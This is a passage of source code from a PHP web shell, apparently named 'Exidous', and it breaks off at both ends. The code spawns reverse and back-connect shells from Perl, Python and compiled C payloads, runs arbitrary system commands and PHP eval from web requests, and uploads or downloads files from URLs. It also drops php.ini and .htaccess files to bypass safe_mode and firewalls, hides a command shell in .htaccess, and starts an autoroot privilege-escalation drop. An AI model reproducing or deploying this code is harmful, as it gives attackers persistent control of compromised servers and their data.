  274. if($file=fopen($fpath,"w")){
  275. fwrite($file,$fc);
  276. fclose($file);
  277. if(is_file($fpath)){
  278. $res = exe("\"".$fpath."\" ".$target);
  279. }
  280. else $result = $errperm;
  281. }
  282. else $result = $errperm;
  283. }
  284.  
  285. }
  286. elseif($type == "xback_pl"){
  287. $fname = "Exidous_back.pl";
  288. $fpath = $d.$fname;
  289. $tar = explode(" ",$target,2);
  290. if(is_file($fpath)) unlink($fpath);
  291. if($file=fopen($fpath,"w")){
  292. fwrite($file,$fc);
  293. fclose($file);
  294. if(is_file($fpath)){
  295. $res = exe("chmod +x ".$fpath);
  296. $res = exe("perl ".$fpath." ".$target);
  297. }
  298. else $result = $errperm;
  299. }
  300. else $result = $errperm;
  301. }
  302. elseif($type == "xback_py"){
  303. $fname = "Exidous_back.py";
  304. $fpath = $d.$fname;
  305. $tar = explode(" ",$target,2);
  306. if(is_file($fpath)) unlink($fpath);
  307. if($file=fopen($fpath,"w")){
  308. fwrite($file,$fc);
  309. fclose($file);
  310. if(is_file($fpath)){
  311. $res = exe("chmod +x ".$fpath);
  312. $res = exe("python ".$fpath." ".$target);
  313. }
  314. else $result = $errperm;
  315. }
  316. else $result = $errperm;
  317.  
  318. }
  319. elseif($type == "xback_bin"){
  320. $fname = "Exidous_back";
  321. $fpath = $d.$fname;
  322. $tar = explode(" ",$target,2);
  323.  
  324. if(!$s_win){
  325. if(is_file($fpath)) unlink($fpath);
  326. if(is_file($fpath.".c")) unlink($fpath.".c");
  327. if($file=fopen($fpath.".c","w")){
  328. fwrite($file,$fc);
  329. fclose($file);
  330. if(is_file($fpath.".c")){
  331. $res = exe("gcc ".$fpath.".c -o ".$fpath);
  332. if(is_file($fpath)){
  333. $res = exe("chmod +x ".$fpath);
  334. $res = exe($fpath." ".$target);
  335. }
  336. else $result = $errgcc;
  337. }
  338. else $result = $errperm;
  339. }
  340. else $result = $errperm;
  341. }
  342. else{
  343. $fpath = $fpath . ".exe";
  344. if(is_file($fpath)) unlink($fpath);
  345. if($file=fopen($fpath,"w")){
  346. fwrite($file,$fc);
  347. fclose($file);
  348. if(is_file($fpath)){
  349. $res = exe($fpath." ".$target);
  350. }
  351. else $result = $errperm;
  352. }
  353. else $result = $errperm;
  354. }
  355. }
  356.  
  357. return $result;
  358. }
  359. // get file size
  360. function gs($f){
  361. if($s = filesize($f)){
  362. if($s <= 1024) return $s;
  363. else{
  364. if($s <= 1024*1024) {
  365. $s = round($s / 1024,2);;
  366. return $s." kb";
  367. }
  368. else {
  369. $s = round($s / 1024 / 1024,2);
  370. return $s." mb";
  371. }
  372. }
  373. }
  374. else return "???";
  375. }
  376. // get file permissions
  377. function gp($f){
  378. if($m=fileperms($f)){
  379. $p='';
  380. $p .= ($m & 00400) ? 'r' : '-';
  381. $p .= ($m & 00200) ? 'w' : '-';
  382. $p .= ($m & 00100) ? 'x' : '-';
  383. $p .= ($m & 00040) ? 'r' : '-';
  384. $p .= ($m & 00020) ? 'w' : '-';
  385. $p .= ($m & 00010) ? 'x' : '-';
  386. $p .= ($m & 00004) ? 'r' : '-';
  387. $p .= ($m & 00002) ? 'w' : '-';
  388. $p .= ($m & 00001) ? 'x' : '-';
  389. return $p;
  390. }
  391. else return "??????????";
  392. }
  393. // shell command
  394. function exe($c){
  395. if(function_exists('system')) {
  396. ob_start();
  397. system($c);
  398. $b = ob_get_contents();
  399. ob_end_clean();
  400. return $b;
  401. }
  402. elseif(function_exists('shell_exec')){
  403. $b = shell_exec($c);
  404. return $b;
  405. }
  406. elseif(function_exists('exec')) {
  407. exec($c,$r);
  408. $b = "";
  409. foreach($r as $s){
  410. $b .= $s;
  411. }
  412. return $b;
  413. }
  414. elseif(function_exists('passthru')) {
  415. ob_start();
  416. passthru($c);
  417. $b = ob_get_contents();
  418. ob_end_clean();
  419. return $b;
  420. }
  421. return ""; // failed... oh my
  422. }
  423. // add slash to the end of given path
  424. function cp($p){
  425. if(is_dir($p)){
  426. $x = DIRECTORY_SEPARATOR;
  427. while(substr($p,-1) == $x) $p = rtrim($p,$x);
  428. return $p.$x;
  429. }
  430. return $p;
  431. }
  432. // delete dir and all of its content (no warning !) xp
  433. function rmdirs($d) {
  434. $f = glob($d . '*', GLOB_MARK);
  435. foreach($f as $z){
  436. if(is_dir($z)) rmdirs($z);
  437. else unlink($z);
  438. }
  439. if(is_dir($d)) rmdir($d);
  440. }
  441. function xwhich($pr){
  442. $p = exe("which $pr");
  443. if(trim($p)!="") { return trim($p); } else { return trim($pr); }
  444. }
  445. // download file from internet
  446. function dlfile($u,$p){
  447. $n = basename($u);
  448.  
  449. // try using php functions
  450. if($t = file_get_contents($u)){
  451. if(is_file($p)) unlink($p);;
  452. if($f=fopen($p,"w")){
  453. fwrite($f,$t);
  454. fclose($f);
  455. if(is_file($p)) return true;
  456. }
  457. }
  458.  
  459. // using wget
  460. exe(xwhich('wget')." ".$u." -O ".$p);
  461. if(is_file($p)) return true;
  462.  
  463. // try using lwp-download
  464. exe(xwhich('lwp-download')." ".$u." ".$p);
  465. if(is_file($p)) return true;
  466.  
  467. // try using lynx
  468. exe(xwhich('lynx')." -source ".$u." > ".$p);
  469. if(is_file($p)) return true;
  470.  
  471. // try using curl
  472. exe(xwhich('curl')." ".$u." -o ".$p);
  473. if(is_file($p)) return true;
  474.  
  475. return false;
  476. }
  477. // explorer, return a table of given dir
  478. function showdir($pwd,$prompt,$win){
  479. if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
  480. else $posix = FALSE;
  481.  
  482. $user = "????:????";
  483. $fname = array();
  484. $dname = array();
  485.  
  486. if($dh = scandir($pwd)){
  487. foreach($dh as $file){
  488. if(is_dir($file)) $dname[] = $file;
  489. elseif(is_file($file)) $fname[] = $file;
  490. }
  491. }
  492. else{
  493. if($dh = opendir($pwd)){
  494. while($file = readdir($dh)){
  495. if(is_dir($file)) $dname[] = $file;
  496. elseif(is_file($file))$fname[] = $file;
  497. }
  498. closedir($dh);
  499. }
  500. }
  501.  
  502. sort($fname);
  503. sort($dname);
  504.  
  505. $path = explode(DIRECTORY_SEPARATOR,$pwd);
  506. $tree = sizeof($path);
  507. $parent = "";
  508.  
  509. $buff = "
  510. <table class=\"explore sortable\">
  511. <tr><th>name</th><th style=\"width:60px;\">size</th><th style=\"width:100px;\">owner : group</th><th style=\"width:70px;\">perms</th><th
  512. style=\"width:110px;\">modified</th><th style=\"width:210px;\">actions</th></tr>
  513. ";
  514. if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
  515. else $parent = $pwd;
  516.  
  517. foreach($dname as $folder){
  518. if($folder == ".") {
  519. if(!$win && $posix){
  520. $name = posix_getpwuid(fileowner($folder));
  521. $group = posix_getgrgid(filegroup($folder));
  522. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  523. }
  524. else {
  525. $owner = $user;
  526. }
  527. $buff .= "<tr><td><a href=\"?d=".$pwd."\">[ $folder ]</a></td><td>LINK</td><td style=\"text-align:center;\">".$owner."</td><td
  528. style=\"text-align:center;\">".gp($pwd)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",filemtime($pwd))."</td><td><span id=\"titik1\"><a
  529. href=\"?d=$pwd&amp;edit=".$pwd."newfile.php\">newfile</a> | <a href=\"javascript:dragon('titik1','titik1_form');\">newfolder</a> | <a
  530. href=\"?upload&amp;d=$pwd\">upload</a> | <a href=\"?d=$pwd&fname=". GetFolderName($pwd) ."&amp;zip=$pwd\">Zip/Tar</a></span>
  531. <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  532. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  533. <input class=\"inputz\" id=\"titik1_\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  534. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
  535. </form></td></tr>
  536. ";
  537.  
  538. }
  539. elseif($folder == "..") {
  540. if(!$win && $posix){
  541. $name = posix_getpwuid(fileowner($folder));
  542. $group = posix_getgrgid(filegroup($folder));
  543. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  544. }
  545. else {
  546. $owner = $user;
  547. }
  548. $buff .= "<tr><td><a href=\"?d=".$parent."\">[ $folder ]</a></td><td>LINK</td><td style=\"text-align:center;\">".$owner."</td><td
  549. style=\"text-align:center;\">".gp($parent)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",filemtime($parent))."</td><td><span id=\"titik2\"><a
  550. href=\"?d=$pwd&amp;edit=".$parent."newfile.php\">newfile</a> | <a href=\"javascript:dragon('titik2','titik2_form');\">newfolder</a> | <a
  551. href=\"?upload&amp;d=$parent\">upload</a></span>
  552. <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  553. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  554. <input class=\"inputz\" id=\"titik2_\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  555. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
  556. </form>
  557. </td></tr>";
  558. }
  559. else {
  560. if(!$win && $posix){
  561. $name = posix_getpwuid(fileowner($folder));
  562. $group = posix_getgrgid(filegroup($folder));
  563. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  564. }
  565. else {
  566. $owner = $user;
  567. }
  568. $buff .= "<tr><td><a id=\"".cs($folder)."_link\" href=\"?d=".$pwd.$folder.DIRECTORY_SEPARATOR."\">[ $folder ]</a>
  569. <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\" id=\"".cs($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  570. <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
  571. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  572. <input class=\"inputz\" style=\"width:200px;\" id=\"".cs($folder)."_link_\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
  573. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  574. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"dragon('".cs($folder)."_form','".cs($folder)."_link');\" />
  575. </form>
  576. <td>DIR</td><td style=\"text-align:center;\">".$owner."</td><td style=\"text-align:center;\">".gp($pwd.$folder)."</td><td
  577. style=\"text-align:center;\">".date("d-M-Y H:i",filemtime($folder))."</td><td><a
  578. href=\"javascript:dragon('".cs($folder)."_link','".cs($folder)."_form');\">rename</a> | <a href=\"?d=".$pwd."&amp;rmdir=".$pwd.$folder."\">delete</a> | <a
  579. href=\"?upload&amp;d=".$pwd.$folder."\">upload</a></td></tr>";
  580. }
  581. }
  582.  
  583. foreach($fname as $file){
  584. $full = $pwd.$file;
  585. if(!$win && $posix){
  586. $name = posix_getpwuid(fileowner($full));
  587. $group = posix_getgrgid(filegroup($full));
  588. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  589. }
  590. else {
  591. $owner = $user;
  592. }
  593. $buff .= "<tr><td><a id=\"".cs($file)."_link\" href=\"?d=$pwd&amp;view=$full\">$file</a>
  594. <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\" id=\"".cs($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  595. <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  596. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  597. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" id=\"".cs($file)."_link_\" name=\"newname\" value=\"".$file."\" />
  598. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  599. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"dragon('".cs($file)."_link','".cs($file)."_form');\" />
  600. </form>
  601. </td><td>".gs($full)."</td><td style=\"text-align:center;\">".$owner."</td><td style=\"text-align:center;\">".gp($full)."</td><td
  602. style=\"text-align:center;\">".date("d-M-Y H:i",filemtime($full))."</td>
  603. <td><a href=\"?d=$pwd&amp;edit=$full\">edit</a> | <a href=\"javascript:dragon('".cs($file)."_link','".cs($file)."_form');\">rename</a> | <a
  604. href=\"?d=$pwd&amp;delete=$full\">delete</a> | <a href=\"?d=$pwd&amp;dl=$full\">download</a>&nbsp;(<a href=\"?d=$pwd&amp;dlgzip=$full\">gzip</a>) | <a href=\"?d=$pwd&fname=". cs($file)."&amp;zip=$full\">Zip/Tar</td></tr>";
  605. }
  606. $buff .= "</table>";
  607. return $buff;
  608. }
  609.  
  610. // favicon
  611. if(isset($_REQUEST['favicon'])){
  612. $data = gzinflate(base64_decode($favicon));
  613. header("Content-type: image/png");
  614. header("Cache-control: public");
  615. echo $data;
  616. exit;
  617. }
  618. if($s_auth){
  619. // server software
  620. $s_software = getenv("SERVER_SOFTWARE");
  621. // check safemode
  622. if (ini_get("safe_mode") or strtolower(ini_get("safe_mode")) == "on") $s_safemode = TRUE; else $s_safemode = FALSE;
  623. // uname -a
  624. $s_system = php_uname();
  625. // check os
  626. $s_win = FALSE;
  627. if(strtolower(substr($s_system,0,3)) == "win") $s_win = TRUE;
  628. // get path and all drives available
  629. $letters = '';
  630. if(!$s_win){
  631. if(!$s_user = rp(exe("whoami"))) $s_user = "";
  632. if(!$s_id = rp(exe("id"))) $s_id = "";
  633. $pwd = getcwd().DIRECTORY_SEPARATOR;
  634. }
  635. else {
  636. $s_user = get_current_user();
  637. $s_id = $s_user;
  638. $pwd = realpath(".")."\\";
  639. // find drive letters
  640. $v = explode("\\",$d);
  641. $v = $v[0];
  642. foreach (range("A","Z") as $letter){
  643. $bool = @is_dir($letter.":\\");
  644. if ($bool){
  645. $letters .= "<a href=\"?d=".$letter.":\\\">[ ";
  646. if ($letter.":" != $v) {$letters .= $letter;}
  647. else {$letters .= "<span class=\"gaya\">".$letter."</span>";}
  648. $letters .= " ]</a> ";
  649. }
  650. }
  651. }
  652. // prompt style..
  653. $s_prompt = $s_user." &gt;";
  654.  
  655. // check for posix
  656. if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $s_posix = TRUE;
  657. else $s_posix = FALSE;
  658.  
  659. // server ip
  660. $s_server_ip = gethostbyname($_SERVER["HTTP_HOST"]);
  661. // your ip ;-)
  662. $s_my_ip = $_SERVER['REMOTE_ADDR'];
  663.  
  664. // change working directory
  665. if(isset($_REQUEST['d'])){
  666. $d = ss($_REQUEST['d']);
  667. if(is_dir($d)){
  668. chdir($d);
  669. $pwd = cp($d);
  670. }
  671. }
  672. else $pwd = cp(getcwd());
  673. // sorttable.js
  674. if(isset($_REQUEST['sorttable'])){
  675. $data = gzinflate(base64_decode($sortable_js));
  676. header("Content-type: text/plain");
  677. header("Cache-control: public");
  678. echo $data;
  679. exit;
  680. }
  681. // Zip/Tar Directory/File
  682. if(isset($_REQUEST['zip']) && ($_REQUEST['zip'] != "")){
  683. $zipcmd = "zip -r ". $_REQUEST['fname']. ".zip ". $_REQUEST['zip'];
  684. $tst = exe($zipcmd);
  685. if($tst == ""){
  686. //tar -zcvf prog-1-jan-2005.tar.gz /home/jerry/prog
  687. $zipcmd = "tar -zcvf ". $_REQUEST['fname']. ".tar.gz ". $_REQUEST['zip'];
  688. $tst = exe($zipcmd);
  689. #
  690. if($tst == ""){
  691. echo "<script>alert('Zip/Tar Failed!')</script>";
  692. }
  693. #
  694. }
  695. }
  696.  
  697. // download file specified by ?dl=<file>
  698. if(isset($_REQUEST['dl']) && ($_REQUEST['dl'] != "")){
  699. $f = ss($_REQUEST['dl']);
  700. $fc = file_get_contents($f);
  701. header("Content-type: application/octet-stream");
  702. header("Content-length: ".strlen($fc));
  703. header("Content-disposition: attachment; filename=\"".basename($f)."\";");
  704. echo $fc;
  705. exit;
  706. } // download file specified by ?dlgzip=<file> as gzip
  707. elseif(isset($_REQUEST['dlgzip']) && ($_REQUEST['dlgzip'] != "")){
  708. $f = ss($_REQUEST['dlgzip']);
  709. $fc = gzencode(file_get_contents($f));
  710. header("Content-Type:application/x-gzip\n");
  711. header("Content-length: ".strlen($fc));
  712. header("Content-disposition: attachment; filename=\"".basename($f).".gz\";");
  713. echo $fc;
  714. exit;
  715. }
  716. // kill process specified by pid
  717. if(isset($_REQUEST['pid'])){
  718. $p = ss($_REQUEST['pid']);
  719. if(function_exists("posix_kill")) posix_kill($p,'9');
  720. else{
  721. exe("kill -9 ".$p);
  722. exe("taskkill /F /PID ".$p);
  723. }
  724. }
  725. // view image specified by ?img=<file>
  726. if(isset($_REQUEST['img'])){
  727. ob_clean();
  728. $d = ss($_REQUEST['d']);
  729. $f = ss($_REQUEST['img']);
  730. $inf = getimagesize($d.$f);
  731. $ext = explode($f,".");
  732. $ext = $ext[count($ext)-1];
  733. header("Content-type: ".$inf["mime"]);
  734. header("Cache-control: public");
  735. header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  736. header("Cache-control: max-age=".(60*60*24*7));
  737. readfile($d.$f);
  738. exit;
  739. }
  740. // rename file or folder
  741. if(isset($_REQUEST['rename']) && isset($_REQUEST['oldname']) && isset($_REQUEST['newname'])){
  742. $old = ss($_REQUEST['oldname']);
  743. $new = ss($_REQUEST['newname']);
  744. rename($pwd.$old,$pwd.$new);
  745. $fnew = $pwd.$new;
  746. }// delete file
  747. if(isset($_REQUEST['delete']) && ($_REQUEST['delete'] != "")){
  748. $f = ss($_REQUEST['delete']);
  749. if(is_file($f)) unlink($f);
  750. } // delete dir
  751. elseif(isset($_REQUEST['rmdir']) && ($_REQUEST['rmdir'] != "")){
  752. $f = ss(rtrim(ss($_REQUEST['rmdir'],DIRECTORY_SEPARATOR)));
  753. if(is_dir($f)) rmdirs($f);
  754. } // create dir
  755. elseif(isset($_REQUEST['mkdir']) && ($_REQUEST['mkdir'] != "")){
  756. $f = ss($pwd.ss($_REQUEST['mkdir']));
  757. if(!is_dir($f)) mkdir($f);
  758. }
  759. // box result
  760. $s_result = "";
  761. // php eval() function
  762. if(isset($_REQUEST['eval'])){
  763. $c = "";
  764. if(isset($_REQUEST['evalcode'])){
  765. // show error
  766. $eval_addition = "error_reporting(E_ALL);@ini_set(\"display_errors\", 1);";
  767. $c = ss($_REQUEST['evalcode']);
  768. ob_start();
  769. eval(eval($eval_addition) . eval($c));
  770. $b = ob_get_contents();
  771. ob_end_clean();
  772. $code = $b;
  773. }
  774. $s_result .= " <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\">
  775. <textarea id=\"evalcode\" name=\"evalcode\" class=\"evalcode\">".htmlspecialchars($code)."</textarea>
  776. <p><input type=\"submit\" name=\"evalcodesubmit\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;\" /></p>
  777. <input type=\"hidden\" name=\"eval\" value=\"\" />
  778. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  779. </form>
  780. ";
  781. }//Auto Symlink
  782.  
  783. if(isset($_REQUEST['syml'])){
  784. if(file_exists($pwd.ss('symlink'))){
  785. exe("rm -rf symlink");
  786. //echo 'lololz';
  787. }else{
  788. $f = ss($pwd.ss('symlink'));
  789. if(!is_dir($f)) mkdir($f);
  790. $myFile = "symlink.php";
  791. $FullDir = "./symlink/symlink.php";
  792. $fh = fopen($FullDir, 'w') or die("can't open file");
  793. $SymlinkScript = gzinflate(base64_decode($Symlink));
  794. fwrite($fh, $SymlinkScript);
  795. $FullDir = "./symlink/php.ini";
  796. $fh = fopen($FullDir, 'w') or die("can't open file");
  797. fwrite($fh, 'safe_mode = Off');
  798.  
  799. //print '<iframe src="'. getBaseUrl().'symlink/symlink.php"></iframe>';
  800. //print '<meta HTTP-EQUIV="REFRESH" content="0; url='. getBaseUrl().'symlink/">';
  801. $s_result .= '<iframe id="myframe" src="'. getBaseUrl().'symlink/symlink.php" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" vspace="0" hspace="0" style="background-color:#C0C0C0; width:100%; display:none;font:terminal"></iframe>';
  802. //print '<meta HTTP-EQUIV="REFRESH" content="0; url='. getBaseUrl().'symlink/">';
  803. //$s_result .= '<iframe id="myframe" src="'. getBaseUrl().'symlink//" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" vspace="0" hspace="0" style="overflow:visible; width:100%; display:none"></iframe>';
  804. }
  805. }
  806. // upload !
  807. elseif(isset($_REQUEST['upload'])){
  808. $s_result = " ";
  809. $msg = "";
  810. if(isset($_REQUEST['uploadhd'])){
  811. $fn = $_FILES['filepath']['name'];
  812. if(is_uploaded_file($_FILES['filepath']['tmp_name'])){
  813. $p = cp(ss($_REQUEST['savefolder']));
  814. if(!is_dir($p)) $p = cp(dirname($p));
  815. if(isset($_REQUEST['savefilename']) && (trim($_REQUEST['savefilename'])!="")) $fn = ss($_REQUEST['savefilename']);
  816. $tm = $_FILES['filepath']['tmp_name'];
  817. $pi = cp($p).$fn;
  818. $st = move_uploaded_file($tm,$pi);
  819. if($st) $msg = "<p class=\"rs_result\">file uploaded to <a href=\"?d=".$pwd."&amp;view=".$pi."\">".$pi."</a></p>";
  820. else $msg = "<p class=\"rs_result\">failed to upload ".$fn."</p>";
  821. }
  822. else $msg = "<p class=\"rs_result\">failed to upload ".$fn."</p>";
  823. }
  824. elseif(isset($_REQUEST['uploadurl'])){
  825. // function dlfile($url,$fpath){
  826. $p = cp(ss($_REQUEST['savefolderurl']));
  827. if(!is_dir($p)) $p = cp(dirname($p));
  828. $fu = ss($_REQUEST['fileurl']);
  829. $fn = basename($fu);
  830. if(isset($_REQUEST['savefilenameurl']) && (trim($_REQUEST['savefilenameurl'])!="")) $fn = ss($_REQUEST['savefilenameurl']);
  831. $fp = cp($p).$fn;
  832. $st = dlfile($fu,$fp);
  833. if($st) $msg = "<p class=\"rs_result\">file uploaded to <a href=\"?d=".$pwd."&amp;view=".$fp."\">".$fp."</a></p>";
  834. else $msg = "<p class=\"rs_result\">failed to upload ".$fn."</p>";
  835. }
  836.  
  837. $s_result .= $msg;
  838. $s_result .= "
  839. <form action=\"" . $_SERVER['PHP_SELF'] . "?upload\" method=\"post\" enctype=\"multipart/form-data\">
  840. <div class=\"mybox\"><h2>Upload from computer</h2>
  841. <table class=\"myboxtbl\">
  842. <tr><td style=\"width:100px;\">File</td><td><input type=\"file\" name=\"filepath\" class=\"inputzbut\" style=\"width:400px;margin:0;\" />
  843. </td></tr>
  844. <tr><td>Save to</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefolder\" value=\"".$pwd."\" /></td></tr>
  845. <tr><td>Filename (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefilename\" value=\"\" /></td></tr>
  846. <tr><td>&nbsp;</td><td>
  847. <input type=\"submit\" name=\"uploadhd\" class=\"inputzbut\" value=\"Upload !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
  848. </td></tr>
  849.  
  850. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  851. </table>
  852. </div>
  853. </form>
  854.  
  855. <form action=\"" . $_SERVER['PHP_SELF'] . "?upload\" method=\"post\">
  856. <div class=\"mybox\"><h2>Upload from internet</h2>
  857. <table class=\"myboxtbl\">
  858. <tr><td style=\"width:100px;\">File URL</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"fileurl\" value=\"\" />
  859. </td></tr>
  860. <tr><td>Save to</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefolderurl\" value=\"".$pwd."\" /></td></tr>
  861. <tr><td>Filename (optional)</td><td><input style=\"width:100%;\" class=\"inputz\" type=\"text\" name=\"savefilenameurl\" value=\"\" /></td></tr>
  862. <tr><td>&nbsp;</td><td>
  863. <input type=\"submit\" name=\"uploadurl\" class=\"inputzbut\" value=\"Upload !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
  864. </td></tr>
  865.  
  866. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  867. </table>
  868. </div>
  869. </form>
  870.  
  871. ";
  872. } // show phpinfo()
  873. elseif(isset($_REQUEST['phpinfo'])){
  874. ob_start();
  875. eval("phpinfo();");
  876. $b = ob_get_contents();
  877. ob_end_clean();
  878. $a = strpos($b,"<body>")+6; // yeah baby,, your body is wonderland ;-)
  879. $z = strpos($b,"</body>");
  880. $s_result = "<div class=\"phpinfo\">".substr($b,$a,$z-$a)."</div>";
  881. }//HTTP Bypass "Python"
  882. if(isset($_REQUEST['svbp'])){
  883. $serverip = $s_server_ip;
  884. $serverip = explode(":",$serverip);
  885.  
  886. if(file_exists($pwd.ss('symlink'))){
  887. exe("killall -9 python");
  888.  
  889. exe("rm -rf symlink");
  890. $s_result .= "Symlink Directory Successfully Removed!";
  891. }else{
  892. $f = ss($pwd.ss('symlink'));
  893. if(!is_dir($f)) mkdir($f);
  894. $myFile = "httpserver.py";
  895. $FullDir = "./symlink/". $myFile;
  896. $fh = fopen($FullDir, 'w') or die("can't open file");
  897. $AutoRoot = gzinflate(base64_decode($PyHttp));
  898. fwrite($fh, $AutoRoot);
  899. //exe("cd exploit;chmod 777 ".$myFile);
  900. echo '<a href="http://'. $serverip[0]. ':13123" target="_blank"> Click Here For Bypass Read Files/Folders</a>';
  901.  
  902. echo '<br><a href="'. CurPageUrl(). '" >Click Here To Remove Bypass!</a>';
  903. $sploitresult = exe("cd symlink;python ". $myFile);
  904. $s_result .= str_replace("\n","<br>",$sploitresult);
  905. }
  906. }//Bypass Functions .htaccess & PHP.INI
  907. if(isset($_REQUEST['byps'])){
  908. $s_result .= "<div class=\"mybox\"><h2>.Htaccess Bypass Firewall</h2>
  909. <form action=\"" . $_SERVER['PHP_SELF'] . "?drhtfw&d=". $pwd. "\" method=\"post\" />
  910. <table class=\"myboxtbl\">
  911. </table>
  912. <input type=\"submit\" name=\"xbind_pl\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
  913. &nbsp;&nbsp;<span id=\"rs1\">".$rspesan."</span>
  914. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  915. </form>
  916. </div>";
  917.  
  918. $s_result .= "<div class=\"mybox\"><h2>.Htaccess Hide Shell (usage: http://site.com/.htaccess?c=whoami)</h2>
  919. <form action=\"" . $_SERVER['PHP_SELF'] . "?drhtsh&d=". $pwd. "\" method=\"post\" />
  920. <table class=\"myboxtbl\">
  921. </table>
  922. <input type=\"submit\" name=\"xbind_pl\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
  923. &nbsp;&nbsp;<span id=\"rs1\">".$rspesan."</span>
  924. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  925. </form>
  926. </div>";
  927.  
  928. $s_result .= "<div class=\"mybox\"><h2>INI.PHP</h2>
  929. <form action=\"" . $_SERVER['PHP_SELF'] . "?driniphp&d= \" method=\"post\" />
  930. <table class=\"myboxtbl\">
  931. </table>
  932. <input type=\"submit\" name=\"xbind_pl\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
  933. &nbsp;&nbsp;<span id=\"rs1\">".$rspesan."</span>
  934. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  935. </form>
  936. </div>";
  937.  
  938. $s_result .= "<div class=\"mybox\"><h2>PHP.INI</h2>
  939. <form action=\"" . $_SERVER['PHP_SELF'] . "?drphpini&d= \" method=\"post\" />
  940. <table class=\"myboxtbl\">
  941. </table>
  942. <input type=\"submit\" name=\"xbind_pl\" class=\"inputzbut\" value=\"Go !\" style=\"width:120px;height:30px;margin:10px 2px 0 2px;\" />
  943. &nbsp;&nbsp;<span id=\"rs1\">".$rspesan."</span>
  944. <input type=\"hidden\" name=\"d\" value=\"".$pwd."\" />
  945. </form>
  946. </div>";
  947. }// Dropping Bypass
  948. elseif(isset($_REQUEST['drhtfw'])){
  949. $FullDir = ".htaccess";
  950. $fh = fopen($FullDir, 'w') or die("can't open file");
  951. $SymlinkScript = gzinflate(base64_decode($HtaccessFWB));
  952. fwrite($fh, $SymlinkScript);
  953. $s_result .= "htaccess dropped successfully!";
  954. }
  955. elseif(isset($_REQUEST['drhtsh'])){
  956. $FullDir = ".htaccess";
  957. $fh = fopen($FullDir, 'w') or die("can't open file");
  958. $SymlinkScript = gzinflate(base64_decode($HtaccessHideShell));
  959. fwrite($fh, $SymlinkScript);
  960. $s_result .= "htaccess dropped successfully!";
  961.  
  962. }
  963. elseif(isset($_REQUEST['driniphp'])){
  964. $FullDir = "ini.php";
  965. $fh = fopen($FullDir, 'w') or die("can't open file");
  966. $SymlinkScript = gzinflate(base64_decode($INIPHP));
  967. fwrite($fh, $SymlinkScript);
  968. $s_result .= "ini.php Dropped Successfully!";
  969.  
  970. }
  971.  
  972. elseif(isset($_REQUEST['drphpini'])){
  973. $FullDir = "php.ini";
  974. $fh = fopen($FullDir, 'w') or die("can't open file");
  975. $SymlinkScript = gzinflate(base64_decode($PHPINI));
  976. fwrite($fh, $SymlinkScript);
  977. $s_result .= "php.ini Dropped Successfully!";
  978.  
  979. }// Exploits
  980. if(isset($_REQUEST['expl'])){
  981. if(file_exists($pwd.ss('exploit'))){
  982. exe("rm -rf exploit");
  983. $s_result .= "Exploit Directory Successfully Removed!";
  984. }else{
  985. $f = ss($pwd.ss('exploit'));
  986. if(!is_dir($f)) mkdir($f);
  987. $myFile = "autoroot.sh";
